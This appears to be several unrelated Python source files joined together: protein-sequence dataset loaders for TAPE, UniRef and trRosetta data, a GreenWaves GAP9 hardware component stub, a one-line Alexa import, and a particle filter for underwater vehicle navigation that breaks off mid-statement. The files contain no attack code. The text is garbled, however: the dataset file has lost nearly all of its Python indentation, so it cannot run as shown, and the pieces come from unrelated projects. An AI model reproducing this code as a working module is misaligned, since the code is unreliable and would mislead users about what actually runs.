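# Hedged usage sketch (illustrative; "proteins.lmdb" is a hypothetical path):
#
#     dataset = LMDBDataset("proteins.lmdb", in_memory=False)
#     print(len(dataset))   # number of records, read from the b'num_examples' key
#     first = dataset[0]    # dict unpickled from the lmdb record, with an 'id' added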
class TAPEDataset(Dataset):
def __init__(self,
data_path: Union[str, Path],
data_type: str,
split: str,
sub_type : str = 'distance',
eps : float = 1e-6,
in_memory: bool = False,
max_len=700):
"""
data_path : path to data directory
data_type : name of downstream task, [fluorescence, stability, remote_homology,
secondary_structure, contact]
split : data split to load
        sub_type : if data_type == contact, choose 'distance' to get
                   distance instead of binary contact output
"""
self.data_type = data_type
self.sub_type = sub_type
self.eps = eps
self.max_len = max_len
if data_type == 'fluorescence':
if split not in ('train', 'valid', 'test'):
raise ValueError(f"Unrecognized split: {split}. "
f"Must be one of ['train', 'valid', 'test']")
data_file = Path(data_path + f'fluorescence_{split}.lmdb')
self.output_label = 'log_fluorescence'
if data_type == 'stability':
if split not in ('train', 'valid', 'test'):
raise ValueError(f"Unrecognized split: {split}. "
f"Must be one of ['train', 'valid', 'test']")
data_file = Path(data_path + f'stability_{split}.lmdb')
self.output_label = 'stability_score'
if data_type == 'remote_homology':
if split not in ('train', 'valid', 'test_fold_holdout',
'test_family_holdout', 'test_superfamily_holdout'):
raise ValueError(f"Unrecognized split: {split}. Must be one of "
f"['train', 'valid', 'test_fold_holdout', "
f"'test_family_holdout', 'test_superfamily_holdout']")
data_file = Path(data_path + f'remote_homology_{split}.lmdb')
self.output_label = 'fold_label'
if data_type == 'secondary_structure':
if split not in ('train', 'valid', 'casp12', 'ts115', 'cb513'):
raise ValueError(f"Unrecognized split: {split}. Must be one of "
f"['train', 'valid', 'casp12', "
f"'ts115', 'cb513']")
data_file = Path(data_path + f'secondary_structure_{split}.lmdb')
if self.sub_type == 'ss8':
self.output_label = 'ss8'
else:
self.output_label = 'ss3'
if data_type == 'contact':
if split not in ('train', 'train_unfiltered', 'valid', 'test'):
raise ValueError(f"Unrecognized split: {split}. Must be one of "
f"['train', 'train_unfiltered', 'valid', 'test']")
data_file = Path(data_path + f'proteinnet_{split}.lmdb')
self.output_label = 'tertiary'
self.data = LMDBDataset(data_file, in_memory)
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index: int):
item = self.data[index]
primary = item['primary']
mask = None
if self.data_type in ['fluorescence', 'stability', ]:
output = float(item[self.output_label][0])
if self.data_type in ['remote_homology']:
output = item[self.output_label]
diff = max(len(primary) - self.max_len + 1, 1)
start = np.random.choice(diff)
end = start + self.max_len
primary = primary[start: end]
if self.data_type in ['secondary_structure']:
# pad with -1s because of cls/sep tokens
            output = torch.Tensor(item[self.output_label]).to(torch.int8)
diff = max(len(primary) - self.max_len + 1, 1)
start = np.random.choice(diff)
end = start + self.max_len
primary = primary[start: end]
output = output[start:end]
if self.data_type in ['contact']:
            # -1 is ignore, 0 is no contact, 1 is contact
valid_mask = item['valid_mask']
distances = squareform(pdist(item[self.output_label]))
yind, xind = np.indices(distances.shape)
invalid_mask = ~(valid_mask[:, None] & valid_mask[None, :])
invalid_mask |= np.abs(yind - xind) < 6
if self.sub_type == 'distance':
output = torch.tensor(np.exp(-distances ** 2 / 64))
else:
contact_map = np.less(distances, 8.0).astype(np.int64)
contact_map[invalid_mask] = -1
                output = torch.Tensor(contact_map).to(torch.int8)
mask = torch.tensor(~invalid_mask)
diff = max(len(primary) - self.max_len + 1, 1)
start = np.random.choice(diff)
end = start + self.max_len
primary = primary[start: end]
output = output[start:end, start:end]
mask = mask[start:end, start:end]
return primary, output, mask
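# Hedged usage sketch (illustrative; "tape/" is a hypothetical directory that
# must contain the TAPE lmdb files named as in __init__ above):
#
#     ds = TAPEDataset("tape/", "secondary_structure", "train", sub_type="ss3")
#     primary, ss3_labels, mask = ds[0]   # mask stays None for this task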
class CSVDataset(Dataset):
def __init__(self, fpath=None, df=None, split=None, outputs=[], max_len=np.inf):
if df is None:
self.data = pd.read_csv(fpath)
else:
self.data = df
if split is not None:
self.data = self.data[self.data['split'] == split]
self.outputs = outputs
self.data = self.data[['sequence'] + self.outputs]
self.max_len = max_len
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
row = self.data.iloc[idx]
sequence = row['sequence']
if len(sequence) > self.max_len:
start = np.random.choice(len(sequence) - self.max_len)
stop = start + self.max_len
sequence = sequence[start:stop]
return [sequence, *row[self.outputs]]
class FlatDataset(Dataset):
def __init__(self, fpath, offsets, cols=[1]):
self.fpath = fpath
self.offsets = offsets
self.cols = cols
def __len__(self):
return len(self.offsets)
def __getitem__(self, idx):
with open(self.fpath, 'r') as f:
f.seek(self.offsets[idx])
line = f.readline()[:-1] # strip the \n
line = line.split(',')
return [line[i] for i in self.cols]
class FFDataset(Dataset):
def __init__(self, stem, max_len=np.inf, tr_only=True):
self.index = stem + 'ffindex'
self.data = stem + 'ffdata'
result = subprocess.run(['wc', '-l', self.index], stdout=subprocess.PIPE)
self.length = int(result.stdout.decode('utf-8').split(' ')[0])
self.tokenizer = Tokenizer(trR_ALPHABET)
self.table = str.maketrans(dict.fromkeys(string.ascii_lowercase))
self.max_len = max_len
self.tr_only = tr_only
def __len__(self):
return self.length
def __getitem__(self, idx):
result = subprocess.run(['ffindex_get', self.data, self.index, '-n', str(idx + 1)],
stdout=subprocess.PIPE)
a3m = result.stdout.decode('utf-8')
seqs = []
for line in a3m.split('\n'):
# skip labels
if len(line) == 0:
continue
if line[0] == '#':
continue
if line[0] != '>':
# remove lowercase letters and right whitespaces
s = line.rstrip().translate(self.table)
if self.tr_only:
s = ''.join([a if a in trR_ALPHABET else '-' for a in s])
if len(s) > self.max_len:
return torch.tensor([])
seqs.append(s)
seqs = torch.tensor([self.tokenizer.tokenize(s) for s in seqs])
return seqs
def trr_bin(dist, omega, theta, phi):
dist = torch.tensor(np.digitize(dist, DIST_BINS[1:]) % (len(DIST_BINS) - 1))
idx = np.where(omega == omega)
jdx = np.where(omega[idx] < 0)[0]
idx = tuple(i[jdx] for i in idx)
omega[idx] = 2 * np.pi + omega[idx]
omega = torch.tensor(np.digitize(omega, OMEGA_BINS[1:]) % (len(OMEGA_BINS) - 1))
idx = np.where(theta == theta)
jdx = np.where(theta[idx] < 0)[0]
idx = tuple(i[jdx] for i in idx)
theta[idx] = 2 * np.pi + theta[idx]
theta = torch.tensor(np.digitize(theta, THETA_BINS[1:]) % (len(THETA_BINS) - 1))
phi = torch.tensor(np.digitize(phi, PHI_BINS[1:]) % (len(PHI_BINS) - 1))
idx = torch.where(dist == 0)
omega[idx] = 0
theta[idx] = 0
phi[idx] = 0
return dist, omega, theta, phi
class UniRefDataset(Dataset):
"""
Dataset that pulls from UniRef/Uniclust downloads.
The data folder should contain the following:
- 'consensus.fasta': consensus sequences, no line breaks in sequences
- 'splits.json': a dict with keys 'train', 'valid', and 'test' mapping to lists of indices
- 'lengths_and_offsets.npz': byte offsets for the 'consensus.fasta' and sequence lengths
"""
def __init__(self, data_dir: str, split: str, structure=False, pdb=False, coords=False, bins=False,
p_drop=0.0, max_len=2048):
self.data_dir = data_dir
self.split = split
self.structure = structure
self.coords = coords
with open(data_dir + 'splits.json', 'r') as f:
self.indices = json.load(f)[self.split]
metadata = np.load(self.data_dir + 'lengths_and_offsets.npz')
self.offsets = metadata['seq_offsets']
self.pdb = pdb
self.bins = bins
if self.pdb or self.bins:
self.n_digits = 6
else:
self.n_digits = 8
if self.coords:
with open(data_dir + 'coords.pkl', 'rb') as f:
self.structures = pkl.load(f)
self.p_drop = p_drop
self.max_len = max_len
def __len__(self):
return len(self.indices)
def __getitem__(self, idx):
idx = self.indices[idx]
offset = self.offsets[idx]
with open(self.data_dir + 'consensus.fasta') as f:
f.seek(offset)
consensus = f.readline()[:-1]
if len(consensus) - self.max_len > 0:
start = np.random.choice(len(consensus) - self.max_len)
stop = start + self.max_len
else:
start = 0
stop = len(consensus)
if self.coords:
coords = self.structures[str(idx)]
dist, omega, theta, phi = process_coords(coords)
dist = torch.tensor(dist).float()
omega = torch.tensor(omega).float()
theta = torch.tensor(theta).float()
phi = torch.tensor(phi).float()
elif self.structure:
sname = 'structures/{num:{fill}{width}}.npz'.format(num=idx, fill='0', width=self.n_digits)
fname = self.data_dir + sname
if path.isfile(fname):
structure = np.load(fname)
else:
structure = None
if structure is not None:
if np.random.random() < self.p_drop:
structure = None
elif self.pdb:
dist = torch.tensor(structure['dist']).float()
omega = torch.tensor(structure['omega']).float()
theta = torch.tensor(structure['theta']).float()
phi = torch.tensor(structure['phi']).float()
if self.bins:
dist, omega, theta, phi = trr_bin(dist, omega, theta, phi)
else:
dist, omega, theta, phi = bins_to_vals(data=structure)
if structure is None:
dist, omega, theta, phi = bins_to_vals(L=len(consensus))
if self.structure or self.coords:
consensus = consensus[start:stop]
dist = dist[start:stop, start:stop]
omega = omega[start:stop, start:stop]
theta = theta[start:stop, start:stop]
phi = phi[start:stop, start:stop]
return consensus, dist, omega, theta, phi
consensus = consensus[start:stop]
return (consensus, )
class TRRDataset(Dataset):
def __init__(self, data_dir, dataset, return_msa=True, bin=True, untokenize=False, max_len=2048):
"""
Args:
data_dir: str,
path to trRosetta data
dataset: str,
train, valid
return_msa: bool
return full MSA or single sequence
bin: bool
bin structure matrices
tokenizer:
Use this to untokenize sequence if desired
"""
filenames = data_dir + dataset + 'list.txt'
self.filenames = np.loadtxt(filenames, dtype=str)
self.data_dir = data_dir
self.return_msa = return_msa
self.bin = bin
self.max_len = max_len
if untokenize:
self.tokenizer = Tokenizer(trR_ALPHABET)
else:
self.tokenizer = None
def __len__(self):
return len(self.filenames)
def __getitem__(self, idx):
filename = self.data_dir + 'npz/' + self.filenames[idx] + '.npz'
data = np.load(filename)
if self.return_msa:
s = torch.tensor(data['msa'])
ell = s.shape[1]
else:
s = data['msa'][0]
if self.tokenizer is not None:
s = self.tokenizer.untokenize(s)
ell = len(s)
if ell - self.max_len > 0:
start = np.random.choice(ell - self.max_len)
stop = start + self.max_len
else:
start = 0
stop = ell
dist = data['dist6d']
omega = data['omega6d']
theta = data['theta6d']
phi = data['phi6d']
if self.return_msa:
s = s[:, start:stop]
else:
s = s[start:stop]
if self.bin:
dist, omega, theta, phi = trr_bin(dist, omega, theta, phi)
else:
idx = np.where(dist == 0)
dist[idx] = 20.0
dist = torch.tensor(dist).float()
omega = torch.tensor(omega).float()
theta = torch.tensor(theta).float()
phi = torch.tensor(phi).float()
dist = dist[start:stop, start:stop]
omega = omega[start:stop, start:stop]
theta = theta[start:stop, start:stop]
phi = phi[start:stop, start:stop]
return s, dist, omega, theta, phi
class MSAGapDataset(Dataset):
"""Build dataset for trRosetta data: gap-prob and lm/mlm"""
def __init__(self, data_dir, dataset, task, pdb=False, y=None, msa=None,
random_seq=False, npz_dir=None, reweight=True, mask_endgaps=False):
"""
Args:
data_dir: str,
path to trRosetta data
dataset: str,
train, valid, or test
task: str,
gap-prob or lm
pdb: bool,
if True, return structure as inputs; if False, return random sequence
                if pdb is False, you must have task = gap-prob
filtered_y: bool,
if True, use gap probabilities from filtered MSA (task = gap-prob)
or select sequence from filtered MSA (task = lm)
if False, use unfiltered MSA
                Filtered is defined as removing sequences from the MSA where
                gaps only exist at the ends of the sequences
filtered_msa: bool,
if True, use filtered msa; if False, use unfiltered msa
npz_dir: str,
if you have a specified npz directory
pdb_dir: str,
if you have a specified pdb directory
"""
filename = data_dir + dataset + 'list.txt'
pdb_ids = np.loadtxt(filename, dtype=str)
# choose to use specific msa or y instead of the prebuilt ones
# should be in the order of npz_dir and in npy file
self.msa_path = msa
self.y_path = y
# get data dir
if npz_dir:
self.npz_dir = npz_dir
else:
self.npz_dir = data_dir + 'structure/'
all_npzs = os.listdir(self.npz_dir)
selected_npzs = [i for i in pdb_ids if i + '.npz' in all_npzs]
self.filenames = selected_npzs # ids of samples to include
# X options
self.pdb = pdb
self.task = task
self.random_seq = random_seq
# special options for generating y values
self.reweight = reweight
self.mask_endgaps = mask_endgaps
def __len__(self):
return len(self.filenames)
def __getitem__(self, idx):
filename = self.filenames[idx]
data = np.load(self.npz_dir + filename + '.npz')
# grab sequence info
if self.msa_path is not None:
msa_data = np.load(self.msa_path + filename + ".npz")
msa = msa_data['msa']
weights = msa_data['weights']
else:
msa = data['msa']
weights = data['weights']
anchor_seq = msa[0]
if self.random_seq:
flag = True
while flag:
random_idx = np.random.randint(0, len(msa))
base_seq = msa[random_idx]
if (base_seq == 20).sum()/len(base_seq) < 0.20:
flag = False
else:
base_seq = anchor_seq
# choose y type
if self.y_path is not None:
y_data = np.load(self.y_path + filename + 'npz')
y = y_data['y']
y_mask = y_data['y_mask']
elif self.task == "gap-prob":
if self.reweight: # downsampling
y = ((msa == 20) * weights.T).sum(0)/msa.shape[0]
y = torch.FloatTensor(y)
else:
y = torch.FloatTensor(np.sum(msa == 20, axis=0) / msa.shape[0])
y_mask = None
else: # lm
# y, y_mask = self._get_lm_y(msa)
y = torch.LongTensor(base_seq)
y_mask = None
# choose X type
if self.pdb: # use structure for X
dist = torch.FloatTensor(data['dist'])
omega = torch.FloatTensor(data['omega'])
theta = torch.FloatTensor(data['theta'])
phi = torch.FloatTensor(data['phi'])
base_seq = torch.LongTensor(base_seq)
anchor_seq = torch.LongTensor(anchor_seq)
return base_seq, anchor_seq, dist, omega, theta, phi, y, y_mask
else: # use just seq for X (THIS IS ONLY USED FOR GAP PROB)
if self.task == "gap-prob":
chosen = False
while not chosen:
msa_num = np.random.randint(msa.shape[0])
x = msa[msa_num]
seq_mask = x != 20
# only want num of gap < 20%
chosen = np.sum(seq_mask) / x.shape[0] > 0.8
x = torch.LongTensor(x)
seq_mask = torch.BoolTensor(seq_mask)
return x[seq_mask], y[seq_mask]
else:
raise ValueError("""Warning - input type and output type are not compatible,
pdb=False can only be used with task gap-prob""")
def _get_lm_y(self, msa):
if self.mask_endgaps:
y = torch.LongTensor(msa[np.random.choice(msa.shape[0])]) # get random seq from msa
y_mask = []
for i in range(len(y)):
if y[i] != 20:
y_mask += [False] * (i)
break
for j in range(len(y) - 1, -1, -1):
if y[j] != 20:
y_mask += [True] * (j - i + 1)
y_mask += [False] * (len(y) - 1 - j)
break
return y, torch.BoolTensor(y_mask)
else:
y = torch.LongTensor(msa[np.random.choice(msa.shape[0])]) # get random seq from msa
y_mask = None
return y, y_mask
|
#
# Copyright (C) 2020 GreenWaves Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gsystree as st
class Apb_soc_ctrl(st.Component):
def __init__(self, parent, name, soc):
super(Apb_soc_ctrl, self).__init__(parent, name)
self.add_properties({
'vp_component': 'pulp.chips/gap9_v2/apb_soc_impl',
'cluster_power_event': soc.get_property('soc_events/soc_evt_cluster_pok'),
'cluster_clock_gate_event': soc.get_property('soc_events/soc_evt_cluster_cg_ok')
})
self.add_properties(soc.get_property('peripherals/apb_soc_ctrl/config'))
|
from .alexa import AlexaResponse
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2020, University of Southampton
All rights reserved.
Licensed under the BSD 3-Clause License.
See LICENSE.md file in the project root for full license information.
"""
import copy
import math
import numpy as np
from numpy.random import randn, uniform
from auv_nav.sensors import SyncedOrientationBodyVelocity
from auv_nav.tools.interpolate import interpolate
from oplab import Console
# Particle Filter implementation using classes
# TODO: multiprocessing or multithreading
# TODO: port uncertainty calculation from Jim
# TODO: use 3D gaussian models for USBL
def gaussian_pdf(mu, sigma, x):
num = -((mu - x) ** 2) / (sigma ** 2) / 2.0
den = math.sqrt(2.0 * math.pi * (sigma ** 2))
return math.exp(num) / den
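# Worked example (illustrative): for mu=0, sigma=1, x=0 the density is
# 1 / sqrt(2*pi) ~= 0.39894, so gaussian_pdf(0, 1, 0) returns ~0.39894;
# one sigma away, gaussian_pdf(0, 1, 1) returns ~0.24197.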
class Index:
X = 0
Y = 1
Z = 2
ROLL = 3
PITCH = 4
YAW = 5
VX = 6
VY = 7
VZ = 8
ALT = 9
DIM = 10
class Particle:
def __init__(self):
# The real-valued time, in seconds, since some epoch
self.time = None
# A 11-dimensional state vector
self.state = np.zeros((Index.DIM, 1), dtype=float)
# The particle trajectory
self.trajectory = []
self.trajectory_time = []
# The measured errors during PF
self.trajectory_error = []
# Particle weight
self.weight = None
@property
def eastings(self):
return self.state[Index.Y, 0]
@property
def northings(self):
return self.state[Index.X, 0]
def __eq__(self, other):
return self.weight == other.weight
def __lt__(self, other):
return self.weight < other.weight
class UsblObservationModel:
def __init__(self, usbl_noise_sigma_factor):
# The measurement
self.x = None
self.y = None
self.z = None
self.std = None
self.usbl_noise_sigma_factor = usbl_noise_sigma_factor
def set_observation(self, value):
self.x = value.northings
self.y = value.eastings
self.z = value.depth
# TODO: Could we use a 3D Gaussian instead of a 1D?
sigma = math.sqrt(
value.northings_std ** 2
+ value.eastings_std ** 2
+ value.depth_std ** 2
)
self.std = self.usbl_noise_sigma_factor * sigma
def measure(self, p):
"""
        This is the main method of the observation model. It takes a particle,
        compares its position against the latest USBL measurement and computes
        an importance weight for it.
        @param p Reference to the particle to be weighted.
        @return importance weight for the particle (positive, non-zero value).
        """
weight = 1.0
if self.x is not None:
dist = math.sqrt(
(self.x - p.state[Index.X, 0]) ** 2
+ (self.y - p.state[Index.Y, 0]) ** 2
+ (self.z - p.state[Index.Z, 0]) ** 2
)
p.trajectory_error.append(dist)
weight = gaussian_pdf(0, self.std, dist)
return weight
class DeadReckoningMovementModel:
"""
@class MovementModel
@brief Interface for movement models for particle filters.
The movement model in a particle filter defines how a particle's state
changes over time.
"""
def __init__(
self, sensors_std, dvl_noise_sigma_factor, imu_noise_sigma_factor
):
self.sensors_std = sensors_std
self.dvl_noise_sigma_factor = dvl_noise_sigma_factor
self.imu_noise_sigma_factor = imu_noise_sigma_factor
self.movement = np.zeros((Index.DIM, 1), dtype=float)
def set_movement(self, value):
self.movement[Index.Z, 0] = value.depth
self.movement[Index.ROLL, 0] = value.roll * math.pi / 180.0
self.movement[Index.PITCH, 0] = value.pitch * math.pi / 180.0
self.movement[Index.YAW, 0] = value.yaw * math.pi / 180.0
self.movement[Index.VX, 0] = value.x_velocity
self.movement[Index.VY, 0] = value.y_velocity
self.movement[Index.VZ, 0] = value.z_velocity
self.movement[Index.ALT, 0] = value.altitude
def propagate(self, p, dt):
"""
This is the main method of MovementModel. It takes a state reference as
argument and is supposed to extract the state's variables and
manipulate them. dt means delta t and defines the time in seconds that
has passed since the last filter update.
        @param p Reference to the particle whose state is to be manipulated.
@param dt time that has passed since the last filter update in seconds.
"""
depth_std_factor = self.sensors_std["position_z"]["factor"]
depth_std_offset = self.sensors_std["position_z"]["offset"]
velocity_std_factor = self.sensors_std["speed"]["factor"]
velocity_std_offset = self.sensors_std["speed"]["offset"]
imu_noise_std_offset = self.sensors_std["orientation"]["offset"]
imu_noise_std_factor = self.sensors_std["orientation"]["factor"]
k_dvl = self.dvl_noise_sigma_factor
k_imu = self.imu_noise_sigma_factor
def linear_noise(idx, factor, offset, gain=1.0):
return (
self.movement[idx, 0]
+ randn() * (self.movement[idx, 0] * factor + offset) * gain
)
# Propagate all states except for X and Y
p.state[Index.Z, 0] = linear_noise(
Index.Z, depth_std_factor, depth_std_offset
)
p.state[Index.ROLL, 0] = linear_noise(
Index.ROLL, imu_noise_std_factor, imu_noise_std_offset, k_imu
)
p.state[Index.PITCH, 0] = linear_noise(
Index.PITCH, imu_noise_std_factor, imu_noise_std_offset, k_imu
)
p.state[Index.YAW, 0] = linear_noise(
Index.YAW, imu_noise_std_factor, imu_noise_std_offset, k_imu
)
p.state[Index.VX, 0] = linear_noise(
Index.VX, velocity_std_factor, velocity_std_offset, k_dvl
)
p.state[Index.VY, 0] = linear_noise(
Index.VY, velocity_std_factor, velocity_std_offset, k_dvl
)
p.state[Index.VZ, 0] = linear_noise(
Index.VZ, velocity_std_factor, velocity_std_offset, k_dvl
)
cr = math.cos(p.state[Index.ROLL, 0])
sr = math.sin(p.state[Index.ROLL, 0])
cp = math.cos(p.state[Index.PITCH, 0])
sp = math.sin(p.state[Index.PITCH, 0])
cy = math.cos(p.state[Index.YAW, 0])
sy = math.sin(p.state[Index.YAW, 0])
f = np.eye(Index.DIM, dtype=float)
f[Index.X, Index.VX] = cy * cp * dt
f[Index.X, Index.VY] = (cy * sp * sr - sy * cr) * dt
f[Index.X, Index.VZ] = (cy * sp * cr + sy * sr) * dt
f[Index.Y, Index.VX] = sy * cp * dt
f[Index.Y, Index.VY] = (sy * sp * sr + cy * cr) * dt
f[Index.Y, Index.VZ] = (sy * sp * cr - cy * sr) * dt
f[Index.Z, Index.VX] = -sp * dt
f[Index.Z, Index.VY] = cp * sr * dt
f[Index.Z, Index.VZ] = cp * cr * dt
# Propagate the p.state forward
p.state = f @ p.state
p.time += dt
p.trajectory.append(p.state)
p.trajectory_time.append(p.time)
class ParticleFilter:
def __init__(
self,
num_particles,
movement_model,
observation_model,
expected_iterations=0,
):
        # Create independent Particle objects (a multiplied list would alias
        # the same instance num_particles times).
        self.particles = [Particle() for _ in range(num_particles)]
self.particles_history = []
self.iteration = 0
self.iteration_step = int(float(expected_iterations) / 20.0)
self.mm = movement_model
self.om = observation_model
for p in self.particles:
p.weight = 1.0 / float(num_particles)
self.particles_history.append(self.particles)
def __str__(self):
a = (
"Particle Filter with "
+ str(len(self.particles))
+ " particles.\n"
)
for i, p in enumerate(self.particles):
a += " Particle " + str(i) + "\n"
            a += (
                "    (x, y, yaw) = ("
                + str(p.state[Index.X, 0])
                + ", "
                + str(p.state[Index.Y, 0])
                + ", "
                + str(p.state[Index.YAW, 0])
                + ")\n"
            )
a += " w = " + str(p.weight) + "\n"
return a
def set_prior(self, prior):
for i in range(len(self.particles)):
self.particles[i] = copy.deepcopy(prior)
self.particles[i].weight = 1.0 / float(len(self.particles))
def set_observation(self, value):
self.om.set_observation(value)
def set_movement(self, value):
self.mm.set_movement(value)
def should_resample(self):
return self.get_neff() < (len(self.particles) / 2.0)
def propagate(self, dt):
for p in self.particles:
self.mm.propagate(p, dt)
if self.iteration == self.iteration_step:
self.particles_history.append(copy.deepcopy(self.particles))
self.iteration = 0
self.iteration += 1
def measure(self):
for p in self.particles:
p.weight *= self.om.measure(p)
self.particles.sort(reverse=True)
self.normalize()
def normalize(self):
s = [p.weight for p in self.particles]
norm = np.sum(s)
# Avoid division by zero
if norm < 1e-20:
norm += 1e-20
for p in self.particles:
p.weight = p.weight / norm
def resample(self):
""" Importance resample """
inverse_num = 1.0 / len(self.particles)
# random start in CDF
start = uniform() * inverse_num
cumulative_weight = 0.0
# index to draw from
source_index = 0
cumulative_weight += self.particles[source_index].weight
new_particles = [None] * len(self.particles)
for dest_index, p in enumerate(self.particles):
# amount of cumulative weight to reach
prob_sum = start + inverse_num * dest_index
# sum weights until
while prob_sum > cumulative_weight:
source_index += 1
if source_index >= len(self.particles):
source_index = len(self.particles) - 1
break
# target sum reached
cumulative_weight += self.particles[source_index].weight
# copy particle (via assignment operator)
new_particles[dest_index] = copy.deepcopy(
self.particles[source_index]
)
# Update the particle list
self.particles = new_particles
def get_neff(self):
""" Returns the number of effective particles """
weights = [p.weight for p in self.particles]
return 1.0 / np.sum(np.square(weights))
def ParticleToSyncedOrientationBodyVelocity(p):
sobv_list = []
for t, x in zip(p.trajectory_time, p.trajectory):
m = SyncedOrientationBodyVelocity()
m.epoch_timestamp = t
m.northings = x[Index.X, 0]
m.eastings = x[Index.Y, 0]
m.depth = x[Index.Z, 0]
m.roll = x[Index.ROLL, 0] * 180.0 / math.pi
m.pitch = x[Index.PITCH, 0] * 180.0 / math.pi
m.yaw = x[Index.YAW, 0] * 180.0 / math.pi
m.x_velocity = x[Index.VX, 0]
m.y_velocity = x[Index.VY, 0]
m.z_velocity = x[Index.VZ, 0]
m.altitude = x[Index.ALT, 0]
sobv_list.append(m)
return sobv_list
def get_prior(dr_list, usbl_list):
dr_index = 0
# Interpolate DR to USBL updates
dr_eastings = []
dr_northings = []
for i in range(len(usbl_list)):
usbl_t = usbl_list[i].epoch_timestamp
dr_t = dr_list[dr_index + 1].epoch_timestamp
while dr_index < len(dr_list) - 2 and usbl_t > dr_t:
usbl_t = usbl_list[i].epoch_timestamp
dr_t = dr_list[dr_index + 1].epoch_timestamp
dr_index += 1
dr_eastings.append(
interpolate(
usbl_list[i].epoch_timestamp,
dr_list[dr_index].epoch_timestamp,
dr_list[dr_index + 1].epoch_timestamp,
dr_list[dr_index].eastings,
dr_list[dr_index + 1].eastings,
)
)
dr_northings.append(
interpolate(
usbl_list[i].epoch_timestamp,
dr_list[dr_index].epoch_timestamp,
dr_list[dr_index + 1].epoch_timestamp,
dr_list[dr_index].northings,
dr_list[dr_index + 1].northings,
)
)
usbl_eastings = [i.eastings for i in usbl_list]
usbl_northings = [i.northings for i in usbl_list]
eastings_error = [y - x for x, y in zip(dr_eastings, usbl_eastings)]
northings_error = [y - x for x, y in zip(dr_northings, usbl_northings)]
eastings_mean = np.mean(eastings_error)
northings_mean = np.mean(northings_error)
dr_index = 0
usbl_index = 0
usbl_t = usbl_list[usbl_index].epoch_timestamp
dr_t = dr_list[usbl_index].epoch_timestamp
while dr_index < len(dr_list) and usbl_t > dr_t:
usbl_t = usbl_list[usbl_index].epoch_timestamp
dr_t = dr_list[usbl_index].epoch_timestamp
dr_index += 1
while usbl_index < len(usbl_list) and usbl_t < dr_t:
usbl_t = usbl_list[usbl_index].epoch_timestamp
dr_t = dr_list[usbl_index].epoch_timestamp
usbl_index += 1
# Fix DR to index zero
dr_index = 0
# Build state from first known USBL and DR, and use that displacement
# error at the start of DR.
x = dr_list[dr_index].northings + northings_mean
y = dr_list[dr_index].eastings + eastings_mean
z = dr_list[dr_index].depth
alt = dr_list[dr_index].altitude
roll = dr_list[dr_index].roll * math.pi / 180.0
pitch = dr_list[dr_index].pitch * math.pi / 180.0
heading = dr_list[dr_index].yaw * math.pi / 180.0
vx = dr_list[dr_index].x_velocity
vy = dr_list[dr_index].y_velocity
vz = dr_list[dr_index].z_velocity
prior = Particle()
prior.state = np.array(
[
[x - northings_mean],
[y - eastings_mean],
[z],
[roll],
[pitch],
[heading],
[vx],
[vy],
[vz],
[alt],
]
)
prior.time = dr_list[0].epoch_timestamp
return prior, dr_index, usbl_index
def run_particle_filter(
usbl_list,
dr_list,
num_particles,
sensors_std,
dvl_noise_sigma_factor,
imu_noise_sigma_factor,
usbl_noise_sigma_factor,
measurement_update_flag=True,
):
"""Execute the particle filter over the dataset
Args:
usbl_list (list): List of USBL measurements
dr_list (list): List of DR measurements
num_particles (int): Number of particles
sensors_std (list): List of sensors standard deviations
dvl_noise_sigma_factor (float): DVL noise std multiplication factor
imu_noise_sigma_factor (float): IMU noise std multiplication factor
usbl_noise_sigma_factor (float): USBL noise std multiplication factor
measurement_update_flag (bool, optional): Whether to perform updates
or not.
Returns:
List: List containing at position
0: Output PF localisation
1: USBL data points used in updates
2: List of particles over time
3: Northings STD
4: Eastings STD
5: Yaw STD
"""
Console.info("Running Particle Filter with:")
Console.info("\t* Number of particles: {}".format(num_particles))
Console.info(
"\t* DVL noise std: f(x)={}x+{} m/s".format(
sensors_std["speed"]["factor"], sensors_std["speed"]["offset"]
)
)
Console.info(
"\t* IMU noise std: f(x)={}x+{} deg".format(
sensors_std["orientation"]["factor"],
sensors_std["orientation"]["offset"],
)
)
Console.info(
"\t* Depth noise std: f(x)={}x+{} meters".format(
sensors_std["position_z"]["factor"],
sensors_std["position_z"]["offset"],
)
)
Console.info(
"\t* USBL noise std: f(x)={}x+{} meters".format(
sensors_std["position_xy"]["factor"],
sensors_std["position_xy"]["offset"],
)
)
Console.info("Running {} iterations...".format(len(dr_list)))
prior, dr_idx, usbl_idx = get_prior(dr_list, usbl_list)
om = UsblObservationModel(usbl_noise_sigma_factor)
mm = DeadReckoningMovementModel(
sensors_std, dvl_noise_sigma_factor, imu_noise_sigma_factor
)
pf = ParticleFilter(
num_particles, mm, om, expected_iterations=len(dr_list)
)
pf.set_prior(prior)
last_t = dr_list[dr_idx].epoch_timestamp
resampled_usbl_list = []
# Loop through all DR
while dr_idx < len(dr_list):
Console.progress(dr_idx, len(dr_list))
dr_stamp = dr_list[dr_idx].epoch_timestamp
if usbl_idx < len(usbl_list):
usbl_stamp = usbl_list[usbl_idx].epoch_timestamp
else:
# Fake a posterior USBL measurement to force PF to read DR
usbl_stamp = dr_stamp + 1
if dr_stamp < usbl_stamp:
# Compute delta t
dt = dr_list[dr_idx].epoch_timestamp - last_t
# Set the current movement
pf.set_movement(dr_list[dr_idx])
# and propagate the filter
pf.propagate(dt)
last_t = dr_list[dr_idx].epoch_timestamp
dr_idx += 1
elif usbl_idx < len(usbl_list):
# Compute delta t
dt = usbl_list[usbl_idx].epoch_timestamp - last_t
# Set the measurement
pf.set_observation(usbl_list[usbl_idx])
# Propagate
pf.propagate(dt)
            # And measure; resample when the effective sample size drops below half the particles
pf.measure()
if pf.should_resample():
pf.resample()
resampled_usbl_list.append(usbl_list[usbl_idx])
last_t = usbl_list[usbl_idx].epoch_timestamp
usbl_idx += 1
# Find best particle
best_particle = pf.particles[0]
# Extract trajectory from it
pf_list = ParticleToSyncedOrientationBodyVelocity(best_particle)
# Get remaining bits
particles_list = pf.particles_history
# TODO: Compute std
northings_std = []
eastings_std = []
yaw_std = []
print("Resampled {} times.".format(len(resampled_usbl_list)))
return [
pf_list,
resampled_usbl_list,
particles_list,
northings_std,
eastings_std,
